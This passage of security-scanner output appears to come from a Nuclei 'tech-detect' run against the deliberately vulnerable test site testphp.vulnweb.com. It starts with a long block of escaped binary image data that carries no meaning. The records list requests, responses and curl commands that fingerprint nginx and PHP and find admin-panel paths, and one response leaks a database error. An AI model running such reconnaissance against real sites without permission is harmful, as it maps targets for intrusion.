\\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:57.60320151Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:57.81170003Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nLocation: http://testphp.vulnweb.com/_mmServerScripts/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:57.854848317Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nLocation: http://testphp.vulnweb.com/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:57.857485821Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:58.325472916Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nLocation: http://testphp.vulnweb.com/bxss/adminPan3l/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:58.952996249Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' 